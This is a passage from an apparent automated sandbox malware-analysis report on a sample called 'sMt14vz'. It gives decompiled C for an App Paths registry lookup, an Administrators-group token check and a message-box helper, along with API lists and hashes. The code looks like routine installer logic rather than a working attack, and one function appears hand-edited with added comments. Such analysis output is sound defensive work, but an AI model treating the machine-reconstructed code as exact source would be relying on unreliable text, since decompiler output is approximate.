                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B3183B5241311FBD7701F39EC4DE6A3EA8F789B41F44851AFAC29A69CCB7A8400CB55
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E010D2773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v269;
                                                                                                                                                                                                                                            				CHAR* _v276;
                                                                                                                                                                                                                                            				int _v280;
                                                                                                                                                                                                                                            				void* _v284;
                                                                                                                                                                                                                                            				int _v288;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                                            				int _t45;
                                                                                                                                                                                                                                            				int* _t50;
                                                                                                                                                                                                                                            				CHAR* _t52;
                                                                                                                                                                                                                                            				CHAR* _t61;
                                                                                                                                                                                                                                            				char* _t62;
                                                                                                                                                                                                                                            				int _t63;
                                                                                                                                                                                                                                            				CHAR* _t64;
                                                                                                                                                                                                                                            				signed int _t65;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t52 = __ecx;
                                                                                                                                                                                                                                            				_t23 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                                                            				_t62 = _a4;
                                                                                                                                                                                                                                            				_t50 = 0;
                                                                                                                                                                                                                                            				_t61 = __ecx;
                                                                                                                                                                                                                                            				_v276 = _t62;
                                                                                                                                                                                                                                            				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                                                            				if( *_t62 != 0x23) {
                                                                                                                                                                                                                                            					_t63 = 0x104;
                                                                                                                                                                                                                                            					goto L14;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t64 = _t62 + 1;
                                                                                                                                                                                                                                            					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                                                            					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                                                            					_t63 = 0x104;
                                                                                                                                                                                                                                            					_t34 = _v269;
                                                                                                                                                                                                                                            					if(_t34 == 0x53) {
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                                                            						goto L15;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_t34 == 0x57) {
                                                                                                                                                                                                                                            							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_push(_t52);
                                                                                                                                                                                                                                            							_v288 = 0x104;
                                                                                                                                                                                                                                            							E010D1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                                                            							_t59 = 0x104;
                                                                                                                                                                                                                                            							E010D658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                                                            							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                                                            								L16:
                                                                                                                                                                                                                                            								_t59 = _t63;
                                                                                                                                                                                                                                            								E010D658A(_t61, _t63, _v276);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								if(RegQueryValueExA(_v284, 0x10d1140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                                                            									_t45 = _v280;
                                                                                                                                                                                                                                            									if(_t45 != 2) {
                                                                                                                                                                                                                                            										L9:
                                                                                                                                                                                                                                            										if(_t45 == 1) {
                                                                                                                                                                                                                                            											goto L10;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            											_t45 = _v280;
                                                                                                                                                                                                                                            											goto L9;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t59 = 0x104;
                                                                                                                                                                                                                                            											E010D1680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                                                            											L10:
                                                                                                                                                                                                                                            											_t50 = 1;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								RegCloseKey(_v284);
                                                                                                                                                                                                                                            								L15:
                                                                                                                                                                                                                                            								if(_t50 == 0) {
                                                                                                                                                                                                                                            									goto L16;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E010D6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                                            0x010d27db
                                                                                                                                                                                                                                            0x010d27dd
                                                                                                                                                                                                                                            0x010d28aa
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d27e3
                                                                                                                                                                                                                                            0x010d27e3
                                                                                                                                                                                                                                            0x010d27ec
                                                                                                                                                                                                                                            0x010d27f8
                                                                                                                                                                                                                                            0x010d2803
                                                                                                                                                                                                                                            0x010d280b
                                                                                                                                                                                                                                            0x010d2831
                                                                                                                                                                                                                                            0x010d28c3
                                                                                                                                                                                                                                            0x010d28c9
                                                                                                                                                                                                                                            0x010d28cd
                                                                                                                                                                                                                                            0x010d2837
                                                                                                                                                                                                                                            0x010d285a
                                                                                                                                                                                                                                            0x010d285c
                                                                                                                                                                                                                                            0x010d2865
                                                                                                                                                                                                                                            0x010d2892
                                                                                                                                                                                                                                            0x010d2895
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2867
                                                                                                                                                                                                                                            0x010d2878
                                                                                                                                                                                                                                            0x010d288c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d287a
                                                                                                                                                                                                                                            0x010d2880
                                                                                                                                                                                                                                            0x010d2885
                                                                                                                                                                                                                                            0x010d2897
                                                                                                                                                                                                                                            0x010d2899
                                                                                                                                                                                                                                            0x010d2899
                                                                                                                                                                                                                                            0x010d2878
                                                                                                                                                                                                                                            0x010d2865
                                                                                                                                                                                                                                            0x010d28a0
                                                                                                                                                                                                                                            0x010d28bf
                                                                                                                                                                                                                                            0x010d28c1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d28c1
                                                                                                                                                                                                                                            0x010d2831
                                                                                                                                                                                                                                            0x010d27dd
                                                                                                                                                                                                                                            0x010d27d5
                                                                                                                                                                                                                                            0x010d28e5

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharUpperA.USER32(C2F4ED82,00000000,00000000,00000000), ref: 010D27A8
                                                                                                                                                                                                                                            • CharNextA.USER32(0000054D), ref: 010D27B5
                                                                                                                                                                                                                                            • CharNextA.USER32(00000000), ref: 010D27BC
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010D2829
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,010D1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010D2852
                                                                                                                                                                                                                                            • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010D2870
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010D28A0
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 010D28AA
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 010D28B9
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 010D27E4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                            • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                            • Opcode ID: 6fac66c81c070d0973f5b0d477847fd363732aad5abf33f6a67cf08069566bdc
                                                                                                                                                                                                                                            • Instruction ID: 32ffdc73c66ee06cae09b104275357cc36d8e4de1699c0b2b078d9b2e4730e08
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6fac66c81c070d0973f5b0d477847fd363732aad5abf33f6a67cf08069566bdc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E941A071A01228AFDB259B64DC85AFABBBDEB15700F0040E9F9C9D3105DB758EC58FA0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                                            			E010D18A3(void* __edx, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				short _v12;
                                                                                                                                                                                                                                            				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                            				long _v24;
                                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                                            				void* _v32;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				long _t45;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				void* _t52;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t51 = __esi;
                                                                                                                                                                                                                                            				_t49 = __edx;
                                                                                                                                                                                                                                            				_t23 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                                                            				_t25 =  *0x10d8128; // 0x2
                                                                                                                                                                                                                                            				_t45 = 0;
                                                                                                                                                                                                                                            				_v12 = 0x500;
                                                                                                                                                                                                                                            				_t50 = 2;
                                                                                                                                                                                                                                            				_v16.Value = 0;
                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                            				if(_t25 != _t50) {
                                                                                                                                                                                                                                            					L20:
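		return E010D6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
	}
	// E010D17EE resolves CheckTokenMembership from advapi32.dll at run time (see the APIs list below).
	if(E010D17EE( &_v20) != 0) {
		_t25 = _v20;
		if(_v20 != 0) {
			 *0x10d8128 = 1;
		}
		goto L20;
	}
	// Fallback path: inspect the process token's groups by hand. 8 = TOKEN_QUERY.
	if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
		goto L20;
	}
	// Size query with class 2 (TokenGroups per the APIs list); expected to fail with 0x7a (ERROR_INSUFFICIENT_BUFFER).
	if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
		L17:
		CloseHandle(_v28);
		_t25 = _v20;
		goto L20;
	} else {
		_push(__esi);
		_t52 = LocalAlloc(0, _v24);
		if(_t52 == 0) {
			L16:
			_pop(_t51);
			goto L17;
		}
		// 0x20 = SECURITY_BUILTIN_DOMAIN_RID, 0x220 = DOMAIN_ALIAS_RID_ADMINS: the BUILTIN\Administrators SID.
		if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
			L15:
			LocalFree(_t52);
			goto L16;
		} else {
			if( *_t52 <= 0) {
				L14:
				FreeSid(_v32);
				goto L15;
			}
			// _t52 is the TOKEN_GROUPS buffer: *_t52 = GroupCount, _t52 + 4 = first Sid pointer, 8 bytes per entry.
			_t15 = _t52 + 4; // 0x4
			_t50 = _t15;
			while(EqualSid( *_t50, _v32) == 0) {
				_t45 = _t45 + 1;
				_t50 = _t50 + 8;
				if(_t45 <  *_t52) {
					continue;
				}
				goto L14;
			}
			// A group matched the Administrators SID: set the global flag and the local result.
			 *0x10d8128 = 1;
			_v20 = 1;
			goto L14;
		}
	}
}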



















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 010D17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,010D18DD), ref: 010D181A
                                                                                                                                                                                                                                              • Part of subcall function 010D17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 010D182C
                                                                                                                                                                                                                                              • Part of subcall function 010D17EE: AllocateAndInitializeSid.ADVAPI32(010D18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,010D18DD), ref: 010D1855
                                                                                                                                                                                                                                              • Part of subcall function 010D17EE: FreeSid.ADVAPI32(?,?,?,?,010D18DD), ref: 010D1883
                                                                                                                                                                                                                                              • Part of subcall function 010D17EE: FreeLibrary.KERNEL32(00000000,?,?,?,010D18DD), ref: 010D188A
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 010D18EB
                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 010D18F2
                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 010D190A
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 010D1918
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000000,?,?), ref: 010D192C
                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 010D1944
                                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 010D1964
                                                                                                                                                                                                                                            • EqualSid.ADVAPI32(00000004,?), ref: 010D197A
                                                                                                                                                                                                                                            • FreeSid.ADVAPI32(?), ref: 010D199C
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 010D19A3
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 010D19AD
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2168512254-0
                                                                                                                                                                                                                                            • Opcode ID: df21d549d16853e1d7b029c206a60dca6b7cf214244980ce261c532816306d56
                                                                                                                                                                                                                                            • Instruction ID: 6bae62eb5225b5d0a6ced15905fb64f34ec08ba0edc856b1b233a80e48e89bc6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: df21d549d16853e1d7b029c206a60dca6b7cf214244980ce261c532816306d56
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C313A71A0130AEFDB609FA9DC88AAFBFBCFF04300B104469FA85D2144DB369905CB65
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E010D44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v64;
                                                                                                                                                                                                                                            				char _v576;
                                                                                                                                                                                                                                            				void* _v580;
                                                                                                                                                                                                                                            				struct HWND__* _v584;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t34;
                                                                                                                                                                                                                                            				void* _t37;
                                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                                            				intOrPtr _t43;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            				signed int _t49;
                                                                                                                                                                                                                                            				signed int _t52;
                                                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                                                            				intOrPtr _t55;
                                                                                                                                                                                                                                            				intOrPtr _t58;
                                                                                                                                                                                                                                            				intOrPtr _t59;
                                                                                                                                                                                                                                            				int _t64;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				intOrPtr* _t67;
                                                                                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                                                                                            				intOrPtr* _t73;
                                                                                                                                                                                                                                            				intOrPtr* _t76;
                                                                                                                                                                                                                                            				intOrPtr* _t77;
                                                                                                                                                                                                                                            				void* _t80;
                                                                                                                                                                                                                                            				void* _t81;
                                                                                                                                                                                                                                            				void* _t82;
                                                                                                                                                                                                                                            				intOrPtr* _t84;
                                                                                                                                                                                                                                            				void* _t85;
                                                                                                                                                                                                                                            				signed int _t89;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t75 = __edx;
                                                                                                                                                                                                                                            				_t34 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                                                            				_v584 = __ecx;
                                                                                                                                                                                                                                            				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                                                            				_t67 = _a4;
                                                                                                                                                                                                                                            				_t69 = 0xd;
                                                                                                                                                                                                                                            				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                                                            				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                                                            				_v580 = _t37;
                                                                                                                                                                                                                                            				asm("movsb");
                                                                                                                                                                                                                                            				if(( *0x10d8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                            					_t39 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_v576 = 0;
                                                                                                                                                                                                                                            					LoadStringA( *0x10d9a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                                                            					if(_v576 != 0) {
                                                                                                                                                                                                                                            						_t73 =  &_v576;
                                                                                                                                                                                                                                            						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                                                            						_t75 = _t16;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t43 =  *_t73;
                                                                                                                                                                                                                                            							_t73 = _t73 + 1;
                                                                                                                                                                                                                                            						} while (_t43 != 0);
                                                                                                                                                                                                                                            						_t84 = _v580;
                                                                                                                                                                                                                                            						_t74 = _t73 - _t75;
                                                                                                                                                                                                                                            						if(_t84 == 0) {
                                                                                                                                                                                                                                            							if(_t67 == 0) {
                                                                                                                                                                                                                                            								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                                                            								_t83 = _t27;
                                                                                                                                                                                                                                            								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                                                            								_t80 = _t44;
                                                                                                                                                                                                                                            								if(_t80 == 0) {
                                                                                                                                                                                                                                            									goto L6;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t75 = _t83;
                                                                                                                                                                                                                                            									_t74 = _t80;
                                                                                                                                                                                                                                            									E010D1680(_t80, _t83,  &_v576);
                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t76 = _t67;
                                                                                                                                                                                                                                            								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                                                            								_t85 = _t24;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t55 =  *_t76;
                                                                                                                                                                                                                                            									_t76 = _t76 + 1;
                                                                                                                                                                                                                                            								} while (_t55 != 0);
                                                                                                                                                                                                                                            								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                                                            								_t83 = _t25 + _t74;
                                                                                                                                                                                                                                            								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                                                            								_t80 = _t44;
                                                                                                                                                                                                                                            								if(_t80 == 0) {
                                                                                                                                                                                                                                            									goto L6;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E010D171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t77 = _t67;
                                                                                                                                                                                                                                            							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                                                            							_t81 = _t18;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t58 =  *_t77;
                                                                                                                                                                                                                                            								_t77 = _t77 + 1;
                                                                                                                                                                                                                                            							} while (_t58 != 0);
                                                                                                                                                                                                                                            							_t75 = _t77 - _t81;
                                                                                                                                                                                                                                            							_t82 = _t84 + 1;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t59 =  *_t84;
                                                                                                                                                                                                                                            								_t84 = _t84 + 1;
                                                                                                                                                                                                                                            							} while (_t59 != 0);
                                                                                                                                                                                                                                            							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                                                            							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                                                            							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                                                            							_t80 = _t44;
                                                                                                                                                                                                                                            							if(_t80 == 0) {
                                                                                                                                                                                                                                            								goto L6;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_push(_v580);
                                                                                                                                                                                                                                            								E010D171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                            								L23:
                                                                                                                                                                                                                                            								MessageBeep(_a12);
                                                                                                                                                                                                                                            								if(E010D681F(_t67) == 0) {
                                                                                                                                                                                                                                            									L25:
                                                                                                                                                                                                                                            									_t49 = 0x10000;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t54 = E010D67C9(_t74, _t74);
                                                                                                                                                                                                                                            									_t49 = 0x190000;
                                                                                                                                                                                                                                            									if(_t54 == 0) {
                                                                                                                                                                                                                                            										goto L25;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t52 = MessageBoxA(_v584, _t80, 0x10d9154, _t49 | _a12 | _a16);
                                                                                                                                                                                                                                            								_t83 = _t52;
                                                                                                                                                                                                                                            								LocalFree(_t80);
                                                                                                                                                                                                                                            								_t39 = _t52;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(E010D681F(_t67) == 0) {
                                                                                                                                                                                                                                            							L4:
                                                                                                                                                                                                                                            							_t64 = 0x10010;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t66 = E010D67C9(0, 0);
                                                                                                                                                                                                                                            							_t64 = 0x190010;
                                                                                                                                                                                                                                            							if(_t66 == 0) {
                                                                                                                                                                                                                                            								goto L4;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t44 = MessageBoxA(_v584,  &_v64, 0x10d9154, _t64);
                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                            						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E010D6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                                                            			}



































                                                                                                                                                                                                                                            0x010d463f
                                                                                                                                                                                                                                            0x010d4640
                                                                                                                                                                                                                                            0x010d4647
                                                                                                                                                                                                                                            0x010d464c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d464c
                                                                                                                                                                                                                                            0x010d4666
                                                                                                                                                                                                                                            0x010d466d
                                                                                                                                                                                                                                            0x010d466f
                                                                                                                                                                                                                                            0x010d4675
                                                                                                                                                                                                                                            0x010d4675
                                                                                                                                                                                                                                            0x010d45ad
                                                                                                                                                                                                                                            0x010d4527
                                                                                                                                                                                                                                            0x010d452e
                                                                                                                                                                                                                                            0x010d453f
                                                                                                                                                                                                                                            0x010d453f
                                                                                                                                                                                                                                            0x010d4530
                                                                                                                                                                                                                                            0x010d4531
                                                                                                                                                                                                                                            0x010d4538
                                                                                                                                                                                                                                            0x010d453d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d453d
                                                                                                                                                                                                                                            0x010d4554
                                                                                                                                                                                                                                            0x010d455a
                                                                                                                                                                                                                                            0x010d455a
                                                                                                                                                                                                                                            0x010d455a
                                                                                                                                                                                                                                            0x010d4525
                                                                                                                                                                                                                                            0x010d468c

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010D4518
                                                                                                                                                                                                                                            • MessageBoxA.USER32(?,?,010D9154,00010010), ref: 010D4554
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000065), ref: 010D45A3
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000065), ref: 010D45E3
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000002), ref: 010D460D
                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 010D4630
                                                                                                                                                                                                                                            • MessageBoxA.USER32(?,00000000,010D9154,00000000), ref: 010D4666
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 010D466F
                                                                                                                                                                                                                                              • Part of subcall function 010D681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 010D686E
                                                                                                                                                                                                                                              • Part of subcall function 010D681F: GetSystemMetrics.USER32(0000004A), ref: 010D68A7
                                                                                                                                                                                                                                              • Part of subcall function 010D681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010D68CC
                                                                                                                                                                                                                                              • Part of subcall function 010D681F: RegQueryValueExA.ADVAPI32(?,010D1140,00000000,?,?,0000000C), ref: 010D68F4
                                                                                                                                                                                                                                              • Part of subcall function 010D681F: RegCloseKey.ADVAPI32(?), ref: 010D6902
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • LoadString() Error. Could not load string resource., xrefs: 010D44E4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
